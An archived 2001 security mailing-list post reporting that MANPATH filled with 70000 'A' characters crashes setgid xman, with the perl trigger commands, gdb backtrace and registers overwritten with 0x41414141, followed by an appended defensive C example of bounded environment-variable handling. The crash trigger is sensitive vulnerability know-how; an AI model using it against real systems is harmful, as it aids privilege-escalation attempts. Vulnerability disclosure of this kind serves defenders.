Re: suid xman 3.1.6 overflows

From: Matias Sedalo (s0t4ipv6at_private)
Date: Mon Jul 16 2001 - 00:16:11 PDT


    The file /usr/X11R6/bin/xman isn't setuid in slackware 7.1/7.2/8.0
    but...
    
    s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 7000'`
    s0t4ipv6@gohan:~$ xman
    Xman Error: No manual pages found.
    s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 70000'`
    s0t4ipv6@gohan:~$ xman
    Segmentation fault
    s0t4ipv6@gohan:~$ uname -a 
    Linux gohan 2.4.5 #4 SMP Thu Jul 12 22:22:32 ART 2001 i686 unknown
    
    ================================================================
    Matias Sedalo.______________________http://www.shellcode.com.ar/
    
    On Wed, 11 Jul 2001, KF wrote:
    
    > xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
    > overflow
    >
    > srtxgat_private is noted as the packager of this RPM. I do not
    > know the author.
    > 
    > [root@linux lib]# ls -al `which xman`
    > -rwxr-sr-x    1 root     man         41076 Jun 17  1998 /usr/X11R6/bin/xman*
    > 
    > [root@linux lib]# xman
    > [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
    > [root@linux lib]# xman
    > Xman Error: Could not allocate memory for manual sections.
    > 
    > [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
    > [root@linux lib]# xman
    > Segmentation fault
    > 
    > [root@linux lib]# gdb xman
    > GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
    > (gdb) run
    > Starting program: /usr/X11R6/bin/xman
    > 0x4022fb66 in getenv () from /lib/libc.so.6
    > (gdb) bt
    > #0  0x4022fb66 in getenv () from /lib/libc.so.6
    > #1  0x0804bc47 in _start ()
    > #2  0x41414141 in ?? ()
    > Cannot access memory at address 0x41414141
    > 
    > (gdb) info registers
    > eax            0xbffee784       -1073813628
    > ecx            0x804fb29        134544169
    > edx            0x805414c        134562124
    > ebx            0x40328f2c       1077055276
    > esp            0xbffec6fc       0xbffec6fc
    > ebp            0xbffec714       0xbffec714
    > esi            0x6      6
    > edi            0x41414141       1094795585
    > eip            0x4022fb66       0x4022fb66
    > 
    > -KF
    > 
    
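Added example, not part of this thread and not xman's source (which the page does not show): a defender-side illustration in C of how a program should read an environment variable such as MANPATH into a fixed-size buffer, so that an oversized value is rejected rather than copied blindly, and how a colon-separated path list can be counted under a cap. The names `PATHLIST_MAX`, `bounded_getenv`, `count_path_entries` and `check_manpath_len` are assumptions made for this example; the 7000 and 70000 byte inputs mirror the sizes tried in the report above.

```c
/* Added example: bounded handling of a path-list environment variable.
 * PATHLIST_MAX and every function name below are assumed for this
 * illustration; none of it is taken from xman. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for setenv() */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed cap for a path list; a stand-in, not xman's own constant. */
#define PATHLIST_MAX 4096

/* Copy the value of environment variable `name` into dst without ever
 * writing past dstsz bytes. Return value:
 *   >= 0  length of the copied string
 *   -1    variable not set (or dstsz == 0)
 *   -2    value does not fit (the case an unbounded copy mishandles) */
int bounded_getenv(const char *name, char *dst, size_t dstsz)
{
    const char *v = getenv(name);
    if (v == NULL || dstsz == 0)
        return -1;

    /* Scan at most dstsz bytes; never trust the caller-controlled length. */
    size_t n = 0;
    while (n < dstsz && v[n] != '\0')
        n++;
    if (n == dstsz)
        return -2;                 /* reject instead of truncating silently */

    memcpy(dst, v, n + 1);         /* n + 1 <= dstsz, so this is in bounds */
    return (int)n;
}

/* Count the non-empty colon-separated entries in a MANPATH-style list,
 * refusing lists with more than max_entries components. Returns -1 when
 * the cap is exceeded. */
int count_path_entries(const char *list, int max_entries)
{
    int count = 0;
    const char *p = list;
    while (*p != '\0') {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len > 0 && ++count > max_entries)
            return -1;
        if (sep == NULL)
            break;
        p = sep + 1;
    }
    return count;
}

/* Set MANPATH to a constructed value of `len` 'A' bytes (the shape of the
 * input in the report) and run it through bounded_getenv. */
int check_manpath_len(size_t len)
{
    char *big = malloc(len + 1);
    if (big == NULL)
        return -1;
    memset(big, 'A', len);
    big[len] = '\0';
    setenv("MANPATH", big, 1);
    free(big);

    char buf[PATHLIST_MAX];
    return bounded_getenv("MANPATH", buf, sizeof buf);
}

int main(void)
{
    printf("100 bytes   -> %d\n", check_manpath_len(100));
    printf("7000 bytes  -> %d\n", check_manpath_len(7000));
    printf("70000 bytes -> %d\n", check_manpath_len(70000));
    printf("entries     -> %d\n",
           count_path_entries("/usr/man:/usr/local/man::/opt/man", 16));
    return 0;
}
```

The point of returning an error code rather than truncating is that a setgid program can then print a diagnostic and exit, as xman does for the 7000-byte case, instead of letting a 70000-byte value reach a fixed buffer and end in the segmentation fault shown in the thread.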



    This archive was generated by hypermail 2b30 : Mon Jul 16 2001 - 09:13:33 PDT